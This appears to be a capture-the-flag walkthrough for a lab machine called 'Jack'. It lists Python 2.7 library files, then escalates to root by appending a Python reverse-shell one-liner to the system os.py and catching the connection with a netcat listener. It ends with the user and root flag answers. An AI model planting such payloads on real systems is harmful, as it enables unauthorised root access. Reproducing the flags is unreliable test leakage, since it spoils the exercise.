/usr/lib/python2.7/locale.py
/usr/lib/python2.7/formatter.py
/usr/lib/python2.7/compileall.pyc
/usr/lib/python2.7/binhex.py
/usr/lib/python2.7/urllib2.pyc
/usr/lib/python2.7/re.pyc
/usr/lib/python2.7/whichdb.py
/usr/lib/python2.7/xml
/usr/lib/python2.7/markupbase.py
/usr/lib/python2.7/codeop.pyc
/usr/lib/python2.7/commands.pyc
/usr/lib/python2.7/cProfile.pyc
/usr/lib/python2.7/bsddb
/usr/lib/python2.7/pty.pyc
/usr/lib/python2.7/dis.py
/usr/lib/python2.7/uuid.pyc
/usr/lib/python2.7/sre_constants.py
/usr/lib/python2.7/ftplib.pyc
/usr/lib/python2.7/sre_parse.pyc
/usr/lib/python2.7/stringold.py
/usr/lib/python2.7/UserDict.pyc
/usr/lib/python2.7/imputil.py
/usr/lib/python2.7/sndhdr.py
/usr/lib/python2.7/fractions.py
/usr/lib/python2.7/copy.pyc
/usr/lib/python2.7/trace.pyc
/usr/lib/python2.7/pkgutil.pyc
/usr/lib/python2.7/functools.py
/usr/lib/python2.7/weakref.pyc
/usr/lib/python2.7/Cookie.pyc
/usr/lib/python2.7/runpy.pyc
/usr/lib/python2.7/tarfile.py
/usr/lib/python2.7/pickletools.py
/usr/lib/python2.7/BaseHTTPServer.pyc
/usr/lib/python2.7/sunau.pyc
/usr/lib/python2.7/os2emxpath.pyc
/usr/lib/python2.7/calendar.pyc
/usr/lib/python2.7/Queue.py
/usr/lib/python2.7/symbol.py
/usr/lib/python2.7/sha.pyc
/usr/lib/python2.7/warnings.pyc
/usr/lib/python2.7/htmllib.pyc
/usr/lib/python2.7/argparse.egg-info
/usr/lib/python2.7/whichdb.pyc
/usr/lib/python2.7/sre_compile.py
/usr/lib/python2.7/asynchat.py
/usr/lib/python2.7/pdb.pyc
/usr/lib/python2.7/mutex.pyc
/usr/lib/python2.7/anydbm.py
/usr/lib/python2.7/stat.pyc
/usr/lib/python2.7/imputil.pyc
/usr/lib/python2.7/__phello__.foo.pyc
/usr/lib/python2.7/sre_constants.pyc
/usr/lib/python2.7/ntpath.pyc
/usr/lib/python2.7/ensurepip
/usr/lib/python2.7/uu.pyc
/usr/lib/python2.7/_LWPCookieJar.py
/usr/lib/python2.7/sre.pyc
/usr/lib/python2.7/nturl2path.py
/usr/lib/python2.7/StringIO.py
/usr/lib/python2.7/warnings.py
/usr/lib/python2.7/user.py
/usr/lib/python2.7/compileall.py
/usr/lib/python2.7/htmllib.py
/usr/lib/python2.7/platform.py
/usr/lib/python2.7/pydoc.py
/usr/lib/python2.7/DocXMLRPCServer.py
/usr/lib/python2.7/cmd.pyc
/usr/lib/python2.7/socket.pyc
/usr/lib/python2.7/ftplib.py
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/_sysconfigdata.py
/usr/lib/python2.7/LICENSE.txt
/usr/lib/python2.7/mutex.py
/usr/lib/python2.7/argparse.pyc
/usr/lib/python2.7/filecmp.pyc
/usr/lib/python2.7/string.pyc
/usr/lib/python2.7/tty.py
/usr/lib/python2.7/platform.pyc
/usr/lib/python2.7/ctypes
/usr/lib/python2.7/os2emxpath.py
/usr/lib/python2.7/toaiff.py
/usr/lib/python2.7/calendar.py
/usr/lib/python2.7/pickletools.pyc
/usr/lib/python2.7/filecmp.py
/usr/lib/python2.7/repr.py
/usr/lib/python2.7/textwrap.pyc
/usr/lib/python2.7/markupbase.pyc
/usr/lib/python2.7/mimetools.py
/usr/lib/python2.7/re.py
/usr/lib/python2.7/shelve.py
/usr/lib/python2.7/smtplib.pyc
/usr/lib/python2.7/runpy.py
/usr/lib/python2.7/new.py
/usr/lib/python2.7/sets.py
/usr/lib/python2.7/hmac.pyc
/usr/lib/python2.7/hashlib.pyc
/usr/lib/python2.7/mimetypes.py
/usr/lib/python2.7/wsgiref
/usr/lib/python2.7/tabnanny.py
/usr/lib/python2.7/formatter.pyc
/usr/lib/python2.7/struct.py
/usr/lib/python2.7/urllib2.py
/usr/lib/python2.7/antigravity.py
/usr/lib/python2.7/HTMLParser.py
/usr/lib/python2.7/wave.py
/usr/lib/python2.7/linecache.py
/usr/lib/python2.7/sysconfig.py
/usr/lib/python2.7/_abcoll.pyc
/usr/lib/python2.7/asynchat.pyc
/usr/lib/python2.7/HTMLParser.pyc
/usr/lib/python2.7/audiodev.py
/usr/lib/python2.7/wsgiref.egg-info
/usr/lib/python2.7/mailbox.py
/usr/lib/python2.7/pprint.py
/usr/lib/python2.7/getopt.pyc
/usr/lib/python2.7/_weakrefset.py
/usr/lib/python2.7/xdrlib.pyc
/usr/lib/python2.7/asyncore.pyc
/usr/lib/python2.7/BaseHTTPServer.py
/usr/lib/python2.7/code.py
/usr/lib/python2.7/rexec.py
/usr/lib/python2.7/statvfs.py
/usr/lib/python2.7/_threading_local.pyc
/usr/lib/python2.7/genericpath.pyc
/usr/lib/python2.7/shutil.pyc
/usr/lib/python2.7/abc.py
/usr/lib/python2.7/keyword.pyc
/usr/lib/python2.7/dist-packages
/usr/lib/python2.7/mhlib.pyc
/usr/lib/python2.7/site.py
/usr/lib/python2.7/ntpath.py
/usr/lib/python2.7/dbhash.py
/usr/lib/python2.7/binhex.pyc
/usr/lib/python2.7/uu.py
/usr/lib/python2.7/types.py
/usr/lib/python2.7/sets.pyc
/usr/lib/python2.7/sched.py
/usr/lib/python2.7/atexit.pyc
/usr/lib/python2.7/sunaudio.pyc
/usr/lib/python2.7/netrc.pyc
/usr/lib/python2.7/dumbdbm.pyc
/usr/lib/python2.7/dumbdbm.py
/usr/lib/python2.7/code.pyc
/usr/lib/python2.7/sunau.py
/usr/lib/python2.7/nturl2path.pyc
/usr/lib/python2.7/lib-dynload
/usr/lib/python2.7/mailcap.pyc
/usr/lib/python2.7/gzip.py
/usr/lib/python2.7/token.py
/usr/lib/python2.7/cgi.py
/usr/lib/python2.7/pprint.pyc
/usr/lib/python2.7/rexec.pyc
/usr/lib/python2.7/nntplib.py
/usr/lib/python2.7/logging
/usr/lib/python2.7/tokenize.pyc
/usr/lib/python2.7/cgitb.pyc
/usr/lib/python2.7/user.pyc
/usr/lib/python2.7/tty.pyc
/usr/lib/python2.7/new.pyc
/usr/lib/python2.7/SimpleHTTPServer.py
/usr/lib/python2.7/encodings
/usr/lib/python2.7/CGIHTTPServer.py
/usr/lib/python2.7/threading.py
/usr/lib/python2.7/chunk.py
/usr/lib/python2.7/gettext.py
/usr/lib/python2.7/stringprep.pyc
/usr/lib/python2.7/robotparser.py
/usr/lib/python2.7/pipes.pyc
/usr/lib/python2.7/linecache.pyc
/usr/lib/python2.7/fnmatch.pyc
/usr/lib/python2.7/ssl.py
/usr/lib/python2.7/importlib
/usr/lib/python2.7/macurl2path.py
/usr/lib/python2.7/genericpath.py
/usr/lib/python2.7/textwrap.py
/usr/lib/python2.7/fileinput.py
/usr/lib/python2.7/multiprocessing
/usr/lib/python2.7/mimify.py
/usr/lib/python2.7/pstats.py
/usr/lib/python2.7/ConfigParser.py
/usr/lib/python2.7/pickle.pyc
/usr/lib/python2.7/cgitb.py
/usr/lib/python2.7/timeit.py
/usr/lib/python2.7/sched.pyc
/usr/lib/python2.7/bisect.py
/usr/lib/python2.7/abc.pyc
/usr/lib/python2.7/heapq.pyc
/usr/lib/python2.7/pdb.doc
/usr/lib/python2.7/aifc.py
/usr/lib/python2.7/__future__.py
/usr/lib/python2.7/socket.py
/usr/lib/python2.7/glob.py
/usr/lib/python2.7/tabnanny.pyc
/usr/lib/python2.7/modulefinder.pyc
/usr/lib/python2.7/shlex.pyc
/usr/lib/python2.7/io.pyc
/usr/lib/python2.7/sgmllib.py
/usr/lib/python2.7/mimetools.pyc
/usr/lib/python2.7/dummy_thread.py
/usr/lib/python2.7/traceback.py
/usr/lib/python2.7/__future__.pyc
/usr/lib/python2.7/py_compile.pyc
/usr/lib/python2.7/CGIHTTPServer.pyc
/usr/lib/python2.7/decimal.py
/usr/lib/python2.7/pickle.py
/usr/lib/python2.7/httplib.pyc
/usr/lib/python2.7/curses
/usr/lib/python2.7/numbers.pyc
/usr/lib/python2.7/md5.pyc
/usr/lib/python2.7/symtable.pyc
/usr/lib/python2.7/imaplib.py
/usr/lib/python2.7/atexit.py
/usr/lib/python2.7/numbers.py
/usr/lib/python2.7/imghdr.py
/usr/lib/python2.7/SimpleXMLRPCServer.py
/usr/lib/python2.7/hashlib.py
/usr/lib/python2.7/colorsys.py
/usr/lib/python2.7/copy.py
/usr/lib/python2.7/mailcap.py
/usr/lib/python2.7/nntplib.pyc
/usr/lib/python2.7/pydoc.pyc
/usr/lib/python2.7/csv.pyc
/usr/lib/python2.7/macpath.py
/usr/lib/python2.7/py_compile.py
/usr/lib/python2.7/rfc822.py
/usr/lib/python2.7/imaplib.pyc
/usr/lib/python2.7/quopri.py
/usr/lib/python2.7/contextlib.pyc
/usr/lib/python2.7/md5.py
/usr/lib/python2.7/UserList.pyc
/usr/lib/python2.7/stat.py
/usr/lib/python2.7/pyclbr.py
/usr/lib/python2.7/profile.pyc
/usr/lib/python2.7/xmllib.pyc
/usr/lib/python2.7/_abcoll.py
/usr/lib/python2.7/profile.py
/usr/lib/python2.7/xmlrpclib.py
/usr/lib/python2.7/audiodev.pyc
/usr/lib/python2.7/urlparse.pyc
/usr/lib/python2.7/_weakrefset.pyc
/usr/lib/python2.7/UserString.pyc
/usr/lib/python2.7/subprocess.pyc
/usr/lib/python2.7/functools.pyc
/usr/lib/python2.7/urllib.pyc
/usr/lib/python2.7/UserDict.py
/usr/lib/python2.7/subprocess.py
/usr/lib/python2.7/difflib.pyc
/usr/lib/python2.7/commands.py
/usr/lib/python2.7/htmlentitydefs.py
/usr/lib/python2.7/zipfile.py
/usr/lib/python2.7/poplib.py
/usr/lib/python2.7/sysconfig.pyc
/usr/lib/python2.7/xmlrpclib.pyc
/usr/lib/python2.7/json
/usr/lib/python2.7/pyclbr.pyc
/usr/lib/python2.7/dummy_threading.pyc
/usr/lib/python2.7/MimeWriter.py
/usr/lib/python2.7/MimeWriter.pyc
/usr/lib/python2.7/robotparser.pyc
/usr/lib/python2.7/dummy_threading.py
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/shlex.py
/usr/lib/python2.7/SimpleHTTPServer.pyc
/usr/lib/python2.7/inspect.py
/usr/lib/python2.7/decimal.pyc
/usr/lib/python2.7/symbol.pyc
/usr/lib/python2.7/base64.pyc
/usr/lib/python2.7/keyword.py
/usr/lib/python2.7/dummy_thread.pyc
/usr/lib/python2.7/dis.pyc
/usr/lib/python2.7/_LWPCookieJar.pyc
/usr/lib/python2.7/locale.pyc
/usr/lib/python2.7/trace.py
/usr/lib/python2.7/io.py
/usr/lib/python2.7/_MozillaCookieJar.py
/usr/lib/python2.7/_strptime.py
/usr/lib/python2.7/fractions.pyc
/usr/lib/python2.7/compiler
/usr/lib/python2.7/getpass.py
/usr/lib/python2.7/gzip.pyc
/usr/lib/python2.7/sndhdr.pyc
/usr/lib/python2.7/random.pyc
/usr/lib/python2.7/lib2to3
/usr/lib/python2.7/collections.py
/usr/lib/python2.7/codecs.py
/usr/lib/python2.7/tempfile.pyc
/usr/lib/python2.7/webbrowser.py
/usr/lib/python2.7/popen2.pyc
/usr/lib/python2.7/urlparse.py
/usr/lib/python2.7/opcode.py
/usr/lib/python2.7/dbhash.pyc
/usr/lib/python2.7/optparse.pyc
/usr/lib/python2.7/fileinput.pyc
/usr/lib/python2.7/fpformat.pyc
/usr/lib/python2.7/gettext.pyc
/usr/lib/python2.7/toaiff.pyc
/usr/lib/python2.7/rlcompleter.py
/usr/lib/python2.7/sre.py
/usr/lib/python2.7/codecs.pyc
/usr/lib/python2.7/this.pyc
/usr/lib/python2.7/unittest
/usr/lib/python2.7/sre_compile.pyc
/usr/lib/python2.7/types.pyc
/usr/lib/python2.7/optparse.py
/usr/lib/python2.7/mhlib.py
/usr/lib/python2.7/cProfile.py
/usr/lib/python2.7/ast.pyc
/usr/lib/python2.7/UserList.py
/usr/lib/python2.7/cookielib.py
/usr/lib/python2.7/SocketServer.pyc
/usr/lib/python2.7/aifc.pyc
/usr/lib/python2.7/sha.py
/usr/lib/python2.7/pstats.pyc
/usr/lib/python2.7/ast.py
/usr/lib/python2.7/ihooks.py
/usr/lib/python2.7/stringold.pyc
/usr/lib/python2.7/token.pyc
/usr/lib/python2.7/copy_reg.pyc
/usr/lib/python2.7/telnetlib.pyc
/usr/lib/python2.7/pydoc_data
/usr/lib/python2.7/__phello__.foo.py
/usr/lib/python2.7/xmllib.py
/usr/lib/python2.7/bdb.pyc
/usr/lib/python2.7/ConfigParser.pyc
/usr/lib/python2.7/chunk.pyc
/usr/lib/python2.7/StringIO.pyc
/usr/lib/python2.7/site.pyc
/usr/lib/python2.7/_strptime.pyc
/usr/lib/python2.7/this.py
/usr/lib/python2.7/imghdr.pyc
/usr/lib/python2.7/mailbox.pyc
/usr/lib/python2.7/email
/usr/lib/python2.7/random.py
/usr/lib/python2.7/doctest.py
/usr/lib/python2.7/antigravity.pyc
/usr/lib/python2.7/Queue.pyc
/usr/lib/python2.7/string.py
/usr/lib/python2.7/pkgutil.py
/usr/lib/python2.7/colorsys.pyc
/usr/lib/python2.7/Bastion.py
/usr/lib/python2.7/_MozillaCookieJar.pyc
/usr/lib/python2.7/netrc.py
/usr/lib/python2.7/tokenize.py
/usr/lib/python2.7/urllib.py
/usr/lib/python2.7/getopt.py
/usr/lib/python2.7/poplib.pyc
/usr/lib/python2.7/_osx_support.py
/usr/lib/python2.7/cgi.pyc
/usr/lib/python2.7/difflib.py
/usr/lib/python2.7/statvfs.pyc
/usr/lib/python2.7/macurl2path.pyc
/usr/lib/python2.7/glob.pyc
/usr/lib/python2.7/opcode.pyc
/usr/lib/python2.7/quopri.pyc
/usr/lib/python2.7/sqlite3
/usr/lib/python2.7/argparse.py
/usr/lib/python2.7/httplib.py
/usr/lib/python2.7/DocXMLRPCServer.pyc
/usr/lib/python2.7/tarfile.pyc
/usr/lib/python2.7/sre_parse.py
/usr/lib/python2.7/timeit.pyc
/usr/lib/python2.7/mimetypes.pyc
/usr/lib/python2.7/sitecustomize.pyc
/usr/lib/python2.7/_pyio.pyc
/usr/lib/python2.7/shelve.pyc
/usr/lib/python2.7/_osx_support.pyc
/usr/lib/python2.7/multifile.py
/usr/lib/python2.7/threading.pyc
/usr/lib/python2.7/cookielib.pyc
/usr/lib/python2.7/codeop.py
/usr/lib/python2.7/traceback.pyc
/usr/lib/python2.7/asyncore.py
/usr/lib/python2.7/popen2.py
/usr/lib/python2.7/zipfile.pyc
/usr/lib/python2.7/doctest.pyc
/usr/lib/python2.7/getpass.pyc
/usr/lib/python2.7/smtplib.py
/etc/python2.7/sitecustomize.py

jack@jack:/opt/statuscheck$ cd /usr/lib/python2.7/
jack@jack:/usr/lib/python2.7$ ls
_abcoll.py          dis.py               macpath.py             py_compile.py           sunaudio.pyc
_abcoll.pyc         dis.pyc              macpath.pyc            py_compile.pyc          sunau.py
abc.py              dist-packages        macurl2path.py         pydoc_data              sunau.pyc
abc.pyc             distutils            macurl2path.pyc        pydoc.py                symbol.py
aifc.py             doctest.py           mailbox.py             pydoc.pyc               symbol.pyc
aifc.pyc            doctest.pyc          mailbox.pyc            _pyio.py                symtable.py
antigravity.py      DocXMLRPCServer.py   mailcap.py             _pyio.pyc               symtable.pyc
antigravity.pyc     DocXMLRPCServer.pyc  mailcap.pyc            Queue.py                _sysconfigdata.py
anydbm.py           dumbdbm.py           markupbase.py          Queue.pyc               _sysconfigdata.pyc
anydbm.pyc          dumbdbm.pyc          markupbase.pyc         quopri.py               sysconfig.py
argparse.egg-info   dummy_threading.py   md5.py                 quopri.pyc              sysconfig.pyc
argparse.py         dummy_threading.pyc  md5.pyc                random.py               tabnanny.py
argparse.pyc        dummy_thread.py      mhlib.py               random.pyc              tabnanny.pyc
ast.py              dummy_thread.pyc     mhlib.pyc              repr.py                 tarfile.py
ast.pyc             email                mimetools.py           repr.pyc                tarfile.pyc
asynchat.py         encodings            mimetools.pyc          re.py                   telnetlib.py
asynchat.pyc        ensurepip            mimetypes.py           re.pyc                  telnetlib.pyc
asyncore.py         filecmp.py           mimetypes.pyc          rexec.py                tempfile.py
asyncore.pyc        filecmp.pyc          MimeWriter.py          rexec.pyc               tempfile.pyc
atexit.py           fileinput.py         MimeWriter.pyc         rfc822.py               test
atexit.pyc          fileinput.pyc        mimify.py              rfc822.pyc              textwrap.py
audiodev.py         fnmatch.py           mimify.pyc             rlcompleter.py          textwrap.pyc
audiodev.pyc        fnmatch.pyc          modulefinder.py        rlcompleter.pyc         this.py
base64.py           formatter.py         modulefinder.pyc       robotparser.py          this.pyc
base64.pyc          formatter.pyc        _MozillaCookieJar.py   robotparser.pyc         _threading_local.py
BaseHTTPServer.py   fpformat.py          _MozillaCookieJar.pyc  runpy.py                _threading_local.pyc
BaseHTTPServer.pyc  fpformat.pyc         multifile.py           runpy.pyc               threading.py
Bastion.py          fractions.py         multifile.pyc          sched.py                threading.pyc
Bastion.pyc         fractions.pyc        multiprocessing        sched.pyc               timeit.py
bdb.py              ftplib.py            mutex.py               sets.py                 timeit.pyc
bdb.pyc             ftplib.pyc           mutex.pyc              sets.pyc                toaiff.py
binhex.py           functools.py         netrc.py               sgmllib.py              toaiff.pyc
binhex.pyc          functools.pyc        netrc.pyc              sgmllib.pyc             tokenize.py
bisect.py           __future__.py        new.py                 sha.py                  tokenize.pyc
bisect.pyc          __future__.pyc       new.pyc                sha.pyc                 token.py
bsddb               genericpath.py       nntplib.py             shelve.py               token.pyc
calendar.py         genericpath.pyc      nntplib.pyc            shelve.pyc              traceback.py
calendar.pyc        getopt.py            ntpath.py              shlex.py                traceback.pyc
CGIHTTPServer.py    getopt.pyc           ntpath.pyc             shlex.pyc               trace.py
CGIHTTPServer.pyc   getpass.py           nturl2path.py          shutil.py               trace.pyc
cgi.py              getpass.pyc          nturl2path.pyc         shutil.pyc              tty.py
cgi.pyc             gettext.py           numbers.py             SimpleHTTPServer.py     tty.pyc
cgitb.py            gettext.pyc          numbers.pyc            SimpleHTTPServer.pyc    types.py
cgitb.pyc           glob.py              opcode.py              SimpleXMLRPCServer.py   types.pyc
chunk.py            glob.pyc             opcode.pyc             SimpleXMLRPCServer.pyc  unittest
chunk.pyc           gzip.py              optparse.py            sitecustomize.py        urllib2.py
cmd.py              gzip.pyc             optparse.pyc           sitecustomize.pyc       urllib2.pyc
cmd.pyc             hashlib.py           os2emxpath.py          site.py                 urllib.py
codecs.py           hashlib.pyc          os2emxpath.pyc         site.pyc                urllib.pyc
codecs.pyc          heapq.py             os.py                  smtpd.py                urlparse.py
codeop.py           heapq.pyc            os.pyc                 smtpd.pyc               urlparse.pyc
codeop.pyc          hmac.py              _osx_support.py        smtplib.py              UserDict.py
code.py             hmac.pyc             _osx_support.pyc       smtplib.pyc             UserDict.pyc
code.pyc            hotshot              pdb.doc                sndhdr.py               UserList.py
collections.py      htmlentitydefs.py    pdb.py                 sndhdr.pyc              UserList.pyc
collections.pyc     htmlentitydefs.pyc   pdb.pyc                socket.py               user.py
colorsys.py         htmllib.py           __phello__.foo.py      socket.pyc              user.pyc
colorsys.pyc        htmllib.pyc          __phello__.foo.pyc     SocketServer.py         UserString.py
commands.py         HTMLParser.py        pickle.py              SocketServer.pyc        UserString.pyc
commands.pyc        HTMLParser.pyc       pickle.pyc             sqlite3                 uuid.py
compileall.py       httplib.py           pickletools.py         sre_compile.py          uuid.pyc
compileall.pyc      httplib.pyc          pickletools.pyc        sre_compile.pyc         uu.py
compiler            ihooks.py            pipes.py               sre_constants.py        uu.pyc
ConfigParser.py     ihooks.pyc           pipes.pyc              sre_constants.pyc       warnings.py
ConfigParser.pyc    imaplib.py           pkgutil.py             sre_parse.py            warnings.pyc
contextlib.py       imaplib.pyc          pkgutil.pyc            sre_parse.pyc           wave.py
contextlib.pyc      imghdr.py            platform.py            sre.py                  wave.pyc
cookielib.py        imghdr.pyc           platform.pyc           sre.pyc                 weakref.py
cookielib.pyc       importlib            plat-x86_64-linux-gnu  ssl.py                  weakref.pyc
Cookie.py           imputil.py           plistlib.py            ssl.pyc                 _weakrefset.py
Cookie.pyc          imputil.pyc          plistlib.pyc           stat.py                 _weakrefset.pyc
copy.py             inspect.py           popen2.py              stat.pyc                webbrowser.py
copy.pyc            inspect.pyc          popen2.pyc             statvfs.py              webbrowser.pyc
copy_reg.py         io.py                poplib.py              statvfs.pyc             whichdb.py
copy_reg.pyc        io.pyc               poplib.pyc             StringIO.py             whichdb.pyc
cProfile.py         json                 posixfile.py           StringIO.pyc            wsgiref
cProfile.pyc        keyword.py           posixfile.pyc          stringold.py            wsgiref.egg-info
csv.py              keyword.pyc          posixpath.py           stringold.pyc           xdrlib.py
csv.pyc             lib2to3              posixpath.pyc          stringprep.py           xdrlib.pyc
ctypes              lib-dynload          pprint.py              stringprep.pyc          xml
curses              lib-tk               pprint.pyc             string.py               xmllib.py
dbhash.py           LICENSE.txt          profile.py             string.pyc              xmllib.pyc
dbhash.pyc          linecache.py         profile.pyc            _strptime.py            xmlrpclib.py
decimal.py          linecache.pyc        pstats.py              _strptime.pyc           xmlrpclib.pyc
decimal.pyc         locale.py            pstats.pyc             struct.py               zipfile.py
difflib.py          locale.pyc           pty.py                 struct.pyc              zipfile.pyc
difflib.pyc         logging              pty.pyc                subprocess.py
dircache.py         _LWPCookieJar.py     pyclbr.py              subprocess.pyc
dircache.pyc        _LWPCookieJar.pyc    pyclbr.pyc             sunaudio.py


jack@jack:/usr/lib/python2.7$ nano os.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")


    
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 1337                                     
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.12.106.
Ncat: Connection from 10.10.12.106:44780.
root@jack:~# cd /root
cd /root
root@jack:~# ls
ls
root.txt
root@jack:~# cat root.txt
cat root.txt
b8b63a861cc09e853f29d8055d64bffb

Gain initial access and obtain the user flag.

Wpscan user enumeration, and don't use tools (ure_other_roles)

0052f7829e48752f2e7bf50f1231548a

Escalate your privileges to root. Whats the root flag?

Python

b8b63a861cc09e853f29d8055d64bffb

[[Sigma]]

Last updated